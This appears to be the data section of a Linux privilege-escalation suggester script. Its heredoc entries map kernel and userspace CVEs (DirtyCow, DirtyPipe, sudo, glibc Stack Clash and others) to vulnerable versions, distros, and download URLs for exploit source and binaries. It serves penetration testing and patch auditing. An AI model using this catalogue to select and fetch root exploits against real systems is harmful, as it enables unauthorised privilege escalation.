EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2016-5195]${txtrst} dirtycow
Reqs: pkg=linux-kernel,ver>=2.6.22,ver<=4.8.3
Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},ubuntu=16.04|14.04|12.04
Rank: 4
analysis-url: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
exploit-db: 40611
author: Phil Oester
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2016-5195]${txtrst} dirtycow 2
Reqs: pkg=linux-kernel,ver>=2.6.22,ver<=4.8.3
Tags: debian=7|8,RHEL=5|6|7,ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic}
Rank: 4
analysis-url: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
ext-url: https://www.exploit-db.com/download/40847
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
exploit-db: 40839
author: FireFart (author of exploit at EDB 40839); Gabriele Bonacini (author of exploit at 'ext-url')
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2016-8655]${txtrst} chocobo_root
Reqs: pkg=linux-kernel,ver>=4.4.0,ver<4.9,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1
Tags: ubuntu=(14.04|16.04){kernel:4.4.0-(21|22|24|28|31|34|36|38|42|43|45|47|51)-generic}
Rank: 1
analysis-url: http://www.openwall.com/lists/oss-security/2016/12/06/1
Comments: CAP_NET_RAW capability is needed OR CONFIG_USER_NS=y needs to be enabled
bin-url: https://raw.githubusercontent.com/rapid7/metasploit-framework/master/data/exploits/CVE-2016-8655/chocobo_root
exploit-db: 40871
author: rebel
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2016-9793]${txtrst} SO_{SND|RCV}BUFFORCE
Reqs: pkg=linux-kernel,ver>=3.11,ver<4.8.14,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1
Tags:
Rank: 1
analysis-url: https://github.com/xairy/kernel-exploits/tree/master/CVE-2016-9793
src-url: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-9793/poc.c
Comments: CAP_NET_ADMIN caps OR CONFIG_USER_NS=y needed. No SMEP/SMAP/KASLR bypass included. Tested in QEMU only
exploit-db: 41995
author: Andrey 'xairy' Konovalov
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2017-6074]${txtrst} dccp
Reqs: pkg=linux-kernel,ver>=2.6.18,ver<=4.9.11,CONFIG_IP_DCCP=[my]
Tags: ubuntu=(14.04|16.04){kernel:4.4.0-62-generic}
Rank: 1
analysis-url: http://www.openwall.com/lists/oss-security/2017/02/22/3
Comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass
exploit-db: 41458
author: Andrey 'xairy' Konovalov
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2017-7308]${txtrst} af_packet
Reqs: pkg=linux-kernel,ver>=3.2,ver<=4.10.6,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1
Tags: ubuntu=16.04{kernel:4.8.0-(34|36|39|41|42|44|45)-generic}
Rank: 1
analysis-url: https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html
src-url: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-7308/poc.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-7308/poc.c
Comments: CAP_NET_RAW cap or CONFIG_USER_NS=y needed. Modified version at 'ext-url' adds support for additional kernels
bin-url: https://raw.githubusercontent.com/rapid7/metasploit-framework/master/data/exploits/cve-2017-7308/exploit
exploit-db: 41994
author: Andrey 'xairy' Konovalov (orginal exploit author); Brendan Coles (author of exploit update at 'ext-url')
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2017-16995]${txtrst} eBPF_verifier
Reqs: pkg=linux-kernel,ver>=4.4,ver<=4.14.8,CONFIG_BPF_SYSCALL=y,sysctl:kernel.unprivileged_bpf_disabled!=1
Tags: debian=9.0{kernel:4.9.0-3-amd64},fedora=25|26|27,ubuntu=14.04{kernel:4.4.0-89-generic},ubuntu=(16.04|17.04){kernel:4.(8|10).0-(19|28|45)-generic}
Rank: 5
analysis-url: https://ricklarabee.blogspot.com/2018/07/ebpf-and-analysis-of-get-rekt-linux.html
Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
bin-url: https://raw.githubusercontent.com/rapid7/metasploit-framework/master/data/exploits/cve-2017-16995/exploit.out
exploit-db: 45010
author: Rick Larabee
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2017-1000112]${txtrst} NETIF_F_UFO
Reqs: pkg=linux-kernel,ver>=4.4,ver<=4.13,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1
Tags: ubuntu=14.04{kernel:4.4.0-*},ubuntu=16.04{kernel:4.8.0-*}
Rank: 1
analysis-url: http://www.openwall.com/lists/oss-security/2017/08/13/1
src-url: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-1000112/poc.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-1000112/poc.c
Comments: CAP_NET_ADMIN cap or CONFIG_USER_NS=y needed. SMEP/KASLR bypass included. Modified version at 'ext-url' adds support for additional distros/kernels
bin-url: https://raw.githubusercontent.com/rapid7/metasploit-framework/master/data/exploits/cve-2017-1000112/exploit.out
exploit-db:
author: Andrey 'xairy' Konovalov (orginal exploit author); Brendan Coles (author of exploit update at 'ext-url')
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2017-1000253]${txtrst} PIE_stack_corruption
Reqs: pkg=linux-kernel,ver>=3.2,ver<=4.13,x86_64
Tags: RHEL=6,RHEL=7{kernel:3.10.0-514.21.2|3.10.0-514.26.1}
Rank: 1
analysis-url: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.txt
src-url: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.c
exploit-db: 42887
author: Qualys
Comments:
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2018-5333]${txtrst} rds_atomic_free_op NULL pointer dereference
Reqs: pkg=linux-kernel,ver>=4.4,ver<=4.14.13,cmd:grep -qi rds /proc/modules,x86_64
Tags: ubuntu=16.04{kernel:4.4.0|4.8.0}
Rank: 1
src-url: https://gist.githubusercontent.com/wbowling/9d32492bd96d9e7c3bf52e23a0ac30a4/raw/959325819c78248a6437102bb289bb8578a135cd/cve-2018-5333-poc.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2018-5333/cve-2018-5333.c
Comments: rds.ko kernel module needs to be loaded. Modified version at 'ext-url' adds support for additional targets and bypassing KASLR.
author: wbowling (orginal exploit author); bcoles (author of exploit update at 'ext-url')
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2018-18955]${txtrst} subuid_shell
Reqs: pkg=linux-kernel,ver>=4.15,ver<=4.19.2,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1,cmd:[ -u /usr/bin/newuidmap ],cmd:[ -u /usr/bin/newgidmap ]
Tags: ubuntu=18.04{kernel:4.15.0-20-generic},fedora=28{kernel:4.16.3-301.fc28}
Rank: 1
analysis-url: https://bugs.chromium.org/p/project-zero/issues/detail?id=1712
src-url: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45886.zip
exploit-db: 45886
author: Jann Horn
Comments: CONFIG_USER_NS needs to be enabled
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2019-13272]${txtrst} PTRACE_TRACEME
Reqs: pkg=linux-kernel,ver>=4,ver<5.1.17,sysctl:kernel.yama.ptrace_scope==0,x86_64
Tags: ubuntu=16.04{kernel:4.15.0-*},ubuntu=18.04{kernel:4.15.0-*},debian=9{kernel:4.9.0-*},debian=10{kernel:4.19.0-*},fedora=30{kernel:5.0.9-*}
Rank: 1
analysis-url: https://bugs.chromium.org/p/project-zero/issues/detail?id=1903
src-url: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47133.zip
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2019-13272/poc.c
Comments: Requires an active PolKit agent.
exploit-db: 47133
exploit-db: 47163
author: Jann Horn (orginal exploit author); bcoles (author of exploit update at 'ext-url')
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2019-15666]${txtrst} XFRM_UAF
Reqs: pkg=linux-kernel,ver>=3,ver<5.0.19,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1,CONFIG_XFRM=y
Tags:
Rank: 1
analysis-url: https://duasynt.com/blog/ubuntu-centos-redhat-privesc
bin-url: https://github.com/duasynt/xfrm_poc/raw/master/lucky0
Comments: CONFIG_USER_NS needs to be enabled; CONFIG_XFRM needs to be enabled
author: Vitaly 'vnik' Nikolenko
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2021-27365]${txtrst} linux-iscsi
Reqs: pkg=linux-kernel,ver<=5.11.3,CONFIG_SLAB_FREELIST_HARDENED!=y
Tags: RHEL=8
Rank: 1
analysis-url: https://blog.grimm-co.com/2021/03/new-old-bugs-in-linux-kernel.html
src-url: https://codeload.github.com/grimm-co/NotQuite0DayFriday/zip/trunk
Comments: CONFIG_SLAB_FREELIST_HARDENED must not be enabled
author: GRIMM
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2021-3490]${txtrst} eBPF ALU32 bounds tracking for bitwise ops
Reqs: pkg=linux-kernel,ver>=5.7,ver<5.12,CONFIG_BPF_SYSCALL=y,sysctl:kernel.unprivileged_bpf_disabled!=1
Tags: ubuntu=20.04{kernel:5.8.0-(25|26|27|28|29|30|31|32|33|34|35|36|37|38|39|40|41|42|43|44|45|46|47|48|49|50|51|52)-*},ubuntu=21.04{kernel:5.11.0-16-*}
Rank: 5
analysis-url: https://www.graplsecurity.com/post/kernel-pwning-with-ebpf-a-love-story
src-url: https://codeload.github.com/chompie1337/Linux_LPE_eBPF_CVE-2021-3490/zip/main
Comments: CONFIG_BPF_SYSCALL needs to be set && kernel.unprivileged_bpf_disabled != 1
author: chompie1337
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2021-22555]${txtrst} Netfilter heap out-of-bounds write
Reqs: pkg=linux-kernel,ver>=2.6.19,ver<=5.12-rc6
Tags: ubuntu=20.04{kernel:5.8.0-*}
Rank: 1
analysis-url: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
src-url: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
Comments: ip_tables kernel module must be loaded
exploit-db: 50135
author: theflow (orginal exploit author); bcoles (author of exploit update at 'ext-url')
EOF
)

EXPLOITS[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2022-0847]${txtrst} DirtyPipe
Reqs: pkg=linux-kernel,ver>=5.8,ver<=5.16.11
Tags: ubuntu=(20.04|21.04),debian=11
Rank: 1
analysis-url: https://dirtypipe.cm4all.com/
src-url: https://haxx.in/files/dirtypipez.c
exploit-db: 50808
author: blasty (original exploit author: Max Kellermann)
EOF
)

############ USERSPACE EXPLOITS ###########################
n=0

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2004-0186]${txtrst} samba
Reqs: pkg=samba,ver<=2.2.8
Tags: 
Rank: 1
exploit-db: 23674
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2009-1185]${txtrst} udev
Reqs: pkg=udev,ver<141,cmd:[[ -f /etc/udev/rules.d/95-udev-late.rules || -f /lib/udev/rules.d/95-udev-late.rules ]]
Tags: ubuntu=8.10|9.04
Rank: 1
exploit-db: 8572
Comments: Version<1.4.1 vulnerable but distros use own versioning scheme. Manual verification needed 
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2009-1185]${txtrst} udev 2
Reqs: pkg=udev,ver<141
Tags:
Rank: 1
exploit-db: 8478
Comments: SSH access to non privileged user is needed. Version<1.4.1 vulnerable but distros use own versioning scheme. Manual verification needed
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2010-0832]${txtrst} PAM MOTD
Reqs: pkg=libpam-modules,ver<=1.1.1
Tags: ubuntu=9.10|10.04
Rank: 1
exploit-db: 14339
Comments: SSH access to non privileged user is needed
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2010-4170]${txtrst} SystemTap
Reqs: pkg=systemtap,ver<=1.3
Tags: RHEL=5{systemtap:1.1-3.el5},fedora=13{systemtap:1.2-1.fc13}
Rank: 1
author: Tavis Ormandy
exploit-db: 15620
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2011-1485]${txtrst} pkexec
Reqs: pkg=polkit,ver=0.96
Tags: RHEL=6,ubuntu=10.04|10.10
Rank: 1
exploit-db: 17942
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2011-2921]${txtrst} ktsuss
Reqs: pkg=ktsuss,ver<=1.4
Tags: sparky=5|6
Rank: 1
analysis-url: https://www.openwall.com/lists/oss-security/2011/08/13/2
src-url: https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2011-2921/ktsuss-lpe.sh
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2012-0809]${txtrst} death_star (sudo)
Reqs: pkg=sudo,ver>=1.8.0,ver<=1.8.3
Tags: fedora=16 
Rank: 1
analysis-url: http://seclists.org/fulldisclosure/2012/Jan/att-590/advisory_sudo.txt
exploit-db: 18436
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2014-0476]${txtrst} chkrootkit
Reqs: pkg=chkrootkit,ver<0.50
Tags: 
Rank: 1
analysis-url: http://seclists.org/oss-sec/2014/q2/430
exploit-db: 33899
Comments: Rooting depends on the crontab (up to one day of delay)
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2014-5119]${txtrst} __gconv_translit_find
Reqs: pkg=glibc|libc6,x86
Tags: debian=6
Rank: 1
analysis-url: http://googleprojectzero.blogspot.com/2014/08/the-poisoned-nul-byte-2014-edition.html
src-url: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/34421.tar.gz
exploit-db: 34421
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2015-1862]${txtrst} newpid (abrt)
Reqs: pkg=abrt,cmd:grep -qi abrt /proc/sys/kernel/core_pattern
Tags: fedora=20
Rank: 1
analysis-url: http://openwall.com/lists/oss-security/2015/04/14/4
src-url: https://gist.githubusercontent.com/taviso/0f02c255c13c5c113406/raw/eafac78dce51329b03bea7167f1271718bee4dcc/newpid.c
exploit-db: 36746
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2015-3315]${txtrst} raceabrt
Reqs: pkg=abrt,cmd:grep -qi abrt /proc/sys/kernel/core_pattern
Tags: fedora=19{abrt:2.1.5-1.fc19},fedora=20{abrt:2.2.2-2.fc20},fedora=21{abrt:2.3.0-3.fc21},RHEL=7{abrt:2.1.11-12.el7}
Rank: 1
analysis-url: http://seclists.org/oss-sec/2015/q2/130
src-url: https://gist.githubusercontent.com/taviso/fe359006836d6cd1091e/raw/32fe8481c434f8cad5bcf8529789231627e5074c/raceabrt.c
exploit-db: 36747
author: Tavis Ormandy
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2015-1318]${txtrst} newpid (apport)
Reqs: pkg=apport,ver>=2.13,ver<=2.17,cmd:grep -qi apport /proc/sys/kernel/core_pattern
Tags: ubuntu=14.04
Rank: 1
analysis-url: http://openwall.com/lists/oss-security/2015/04/14/4
src-url: https://gist.githubusercontent.com/taviso/0f02c255c13c5c113406/raw/eafac78dce51329b03bea7167f1271718bee4dcc/newpid.c
exploit-db: 36746
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2015-1318]${txtrst} newpid (apport) 2
Reqs: pkg=apport,ver>=2.13,ver<=2.17,cmd:grep -qi apport /proc/sys/kernel/core_pattern
Tags: ubuntu=14.04.2
Rank: 1
analysis-url: http://openwall.com/lists/oss-security/2015/04/14/4
exploit-db: 36782
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2015-3202]${txtrst} fuse (fusermount)
Reqs: pkg=fuse,ver<2.9.3
Tags: debian=7.0|8.0,ubuntu=*
Rank: 1
analysis-url: http://seclists.org/oss-sec/2015/q2/520
exploit-db: 37089
Comments: Needs cron or system admin interaction
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2015-1815]${txtrst} setroubleshoot
Reqs: pkg=setroubleshoot,ver<3.2.22
Tags: fedora=21
Rank: 1
exploit-db: 36564
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2015-3246]${txtrst} userhelper
Reqs: pkg=libuser,ver<=0.60
Tags: RHEL=6{libuser:0.56.13-(4|5).el6},RHEL=6{libuser:0.60-5.el7},fedora=13|19|20|21|22
Rank: 1
analysis-url: https://www.qualys.com/2015/07/23/cve-2015-3245-cve-2015-3246/cve-2015-3245-cve-2015-3246.txt 
exploit-db: 37706
Comments: RHEL 5 is also vulnerable, but installed version of glibc (2.5) lacks functions needed by roothelper.c
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2015-5287]${txtrst} abrt/sosreport-rhel7
Reqs: pkg=abrt,cmd:grep -qi abrt /proc/sys/kernel/core_pattern
Tags: RHEL=7{abrt:2.1.11-12.el7}
Rank: 1
analysis-url: https://www.openwall.com/lists/oss-security/2015/12/01/1
src-url: https://www.openwall.com/lists/oss-security/2015/12/01/1/1
exploit-db: 38832
author: rebel
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2015-6565]${txtrst} not_an_sshnuke
Reqs: pkg=openssh-server,ver>=6.8,ver<=6.9
Tags:
Rank: 1
analysis-url: http://www.openwall.com/lists/oss-security/2017/01/26/2
exploit-db: 41173
author: Federico Bento
Comments: Needs admin interaction (root user needs to login via ssh to trigger exploitation)
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2015-8612]${txtrst} blueman set_dhcp_handler d-bus privesc
Reqs: pkg=blueman,ver<2.0.3
Tags: debian=8{blueman:1.23}
Rank: 1
analysis-url: https://twitter.com/thegrugq/status/677809527882813440
exploit-db: 46186
author: Sebastian Krahmer
Comments: Distros use own versioning scheme. Manual verification needed.
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2016-1240]${txtrst} tomcat-rootprivesc-deb.sh
Reqs: pkg=tomcat
Tags: debian=8,ubuntu=16.04
Rank: 1
analysis-url: https://legalhackers.com/advisories/Tomcat-DebPkgs-Root-Privilege-Escalation-Exploit-CVE-2016-1240.html
src-url: http://legalhackers.com/exploits/tomcat-rootprivesc-deb.sh
exploit-db: 40450
author: Dawid Golunski
Comments: Affects only Debian-based distros
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2016-1247]${txtrst} nginxed-root.sh
Reqs: pkg=nginx|nginx-full,ver<1.10.3
Tags: debian=8,ubuntu=14.04|16.04|16.10
Rank: 1
analysis-url: https://legalhackers.com/advisories/Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016-1247.html
src-url: https://legalhackers.com/exploits/CVE-2016-1247/nginxed-root.sh
exploit-db: 40768
author: Dawid Golunski
Comments: Rooting depends on cron.daily (up to 24h of delay). Affected: deb8: <1.6.2; 14.04: <1.4.6; 16.04: 1.10.0; gentoo: <1.10.2-r3
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2016-1531]${txtrst} perl_startup (exim)
Reqs: pkg=exim,ver<4.86.2
Tags: 
Rank: 1
analysis-url: http://www.exim.org/static/doc/CVE-2016-1531.txt
exploit-db: 39549
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2016-1531]${txtrst} perl_startup (exim) 2
Reqs: pkg=exim,ver<4.86.2
Tags: 
Rank: 1
analysis-url: http://www.exim.org/static/doc/CVE-2016-1531.txt
exploit-db: 39535
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2016-4989]${txtrst} setroubleshoot 2
Reqs: pkg=setroubleshoot
Tags: RHEL=6|7
Rank: 1
analysis-url: https://c-skills.blogspot.com/2016/06/lets-feed-attacker-input-to-sh-c-to-see.html
src-url: https://github.com/stealth/troubleshooter/raw/master/straight-shooter.c
exploit-db:
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2016-5425]${txtrst} tomcat-RH-root.sh
Reqs: pkg=tomcat
Tags: RHEL=7
Rank: 1
analysis-url: http://legalhackers.com/advisories/Tomcat-RedHat-Pkgs-Root-PrivEsc-Exploit-CVE-2016-5425.html
src-url: http://legalhackers.com/exploits/tomcat-RH-root.sh
exploit-db: 40488
author: Dawid Golunski
Comments: Affects only RedHat-based distros
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2016-6663,CVE-2016-6664|CVE-2016-6662]${txtrst} mysql-exploit-chain
Reqs: pkg=mysql-server|mariadb-server,ver<5.5.52
Tags: ubuntu=16.04.1
Rank: 1
analysis-url: https://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html
src-url: http://legalhackers.com/exploits/CVE-2016-6663/mysql-privesc-race.c
exploit-db: 40678
author: Dawid Golunski
Comments: Also MariaDB ver<10.1.18 and ver<10.0.28 affected
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2016-9566]${txtrst} nagios-root-privesc
Reqs: pkg=nagios,ver<4.2.4
Tags:
Rank: 1
analysis-url: https://legalhackers.com/advisories/Nagios-Exploit-Root-PrivEsc-CVE-2016-9566.html
src-url: https://legalhackers.com/exploits/CVE-2016-9566/nagios-root-privesc.sh
exploit-db: 40921
author: Dawid Golunski
Comments: Allows priv escalation from nagios user or nagios group
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2017-0358]${txtrst} ntfs-3g-modprobe
Reqs: pkg=ntfs-3g,ver<2017.4
Tags: ubuntu=16.04{ntfs-3g:2015.3.14AR.1-1build1},debian=7.0{ntfs-3g:2012.1.15AR.5-2.1+deb7u2},debian=8.0{ntfs-3g:2014.2.15AR.2-1+deb8u2}
Rank: 1
analysis-url: https://bugs.chromium.org/p/project-zero/issues/detail?id=1072
src-url: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41356.zip
exploit-db: 41356
author: Jann Horn
Comments: Distros use own versioning scheme. Manual verification needed. Linux headers must be installed. System must have at least two CPU cores.
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2017-5899]${txtrst} s-nail-privget
Reqs: pkg=s-nail,ver<14.8.16
Tags: ubuntu=16.04,manjaro=16.10
Rank: 1
analysis-url: https://www.openwall.com/lists/oss-security/2017/01/27/7
src-url: https://www.openwall.com/lists/oss-security/2017/01/27/7/1
ext-url: https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2017-5899/exploit.sh
author: wapiflapi (orginal exploit author); Brendan Coles (author of exploit update at 'ext-url')
Comments: Distros use own versioning scheme. Manual verification needed.
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2017-1000367]${txtrst} Sudoer-to-root
Reqs: pkg=sudo,ver<=1.8.20,cmd:[ -f /usr/sbin/getenforce ]
Tags: RHEL=7{sudo:1.8.6p7}
Rank: 1
analysis-url: https://www.sudo.ws/alerts/linux_tty.html
src-url: https://www.qualys.com/2017/05/30/cve-2017-1000367/linux_sudo_cve-2017-1000367.c
exploit-db: 42183
author: Qualys
Comments: Needs to be sudoer. Works only on SELinux enabled systems
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2017-1000367]${txtrst} sudopwn
Reqs: pkg=sudo,ver<=1.8.20,cmd:[ -f /usr/sbin/getenforce ]
Tags:
Rank: 1
analysis-url: https://www.sudo.ws/alerts/linux_tty.html
src-url: https://raw.githubusercontent.com/c0d3z3r0/sudo-CVE-2017-1000367/master/sudopwn.c
exploit-db:
author: c0d3z3r0
Comments: Needs to be sudoer. Works only on SELinux enabled systems
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2017-1000366,CVE-2017-1000370]${txtrst} linux_ldso_hwcap
Reqs: pkg=glibc|libc6,ver<=2.25,x86
Tags:
Rank: 1
analysis-url: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
src-url: https://www.qualys.com/2017/06/19/stack-clash/linux_ldso_hwcap.c
exploit-db: 42274
author: Qualys
Comments: Uses "Stack Clash" technique, works against most SUID-root binaries
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2017-1000366,CVE-2017-1000371]${txtrst} linux_ldso_dynamic
Reqs: pkg=glibc|libc6,ver<=2.25,x86
Tags: debian=9|10,ubuntu=14.04.5|16.04.2|17.04,fedora=23|24|25
Rank: 1
analysis-url: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
src-url: https://www.qualys.com/2017/06/19/stack-clash/linux_ldso_dynamic.c
exploit-db: 42276
author: Qualys
Comments: Uses "Stack Clash" technique, works against most SUID-root PIEs
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2017-1000366,CVE-2017-1000379]${txtrst} linux_ldso_hwcap_64
Reqs: pkg=glibc|libc6,ver<=2.25,x86_64
Tags: debian=7.7|8.5|9.0,ubuntu=14.04.2|16.04.2|17.04,fedora=22|25,centos=7.3.1611
Rank: 1
analysis-url: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
src-url: https://www.qualys.com/2017/06/19/stack-clash/linux_ldso_hwcap_64.c
exploit-db: 42275
author: Qualys
Comments: Uses "Stack Clash" technique, works against most SUID-root binaries
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2017-1000370,CVE-2017-1000371]${txtrst} linux_offset2lib
Reqs: pkg=glibc|libc6,ver<=2.25,x86
Tags:
Rank: 1
analysis-url: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
src-url: https://www.qualys.com/2017/06/19/stack-clash/linux_offset2lib.c
exploit-db: 42273
author: Qualys
Comments: Uses "Stack Clash" technique
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2018-1000001]${txtrst} RationalLove
Reqs: pkg=glibc|libc6,ver<2.27,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1,x86_64
Tags: debian=9{libc6:2.24-11+deb9u1},ubuntu=16.04.3{libc6:2.23-0ubuntu9}
Rank: 1
analysis-url: https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/
src-url: https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/RationalLove.c
Comments: kernel.unprivileged_userns_clone=1 required
bin-url: https://raw.githubusercontent.com/rapid7/metasploit-framework/master/data/exploits/cve-2018-1000001/RationalLove
exploit-db: 43775
author: halfdog
EOF
)

EXPLOITS_USERSPACE[((n++))]=$(cat <<EOF
Name: ${txtgrn}[CVE-2018-10900]${txtrst} vpnc_privesc.py
Reqs: pkg=networkmanager-vpnc|network-manager-vpnc,ver<1.2.6
Tags: ubuntu=16.04{network-manager-vpnc:1.1.93-1},debian=9.0{network-manager-vpnc:1.2.4-4},manjaro=17
Rank: 1
analysis-url: https://pulsesecurity.co.nz/advisories/NM-VPNC-Privesc
src-url: https://bugzilla.novell.com/attachment.cgi?id=779110
exploit-db: 45313
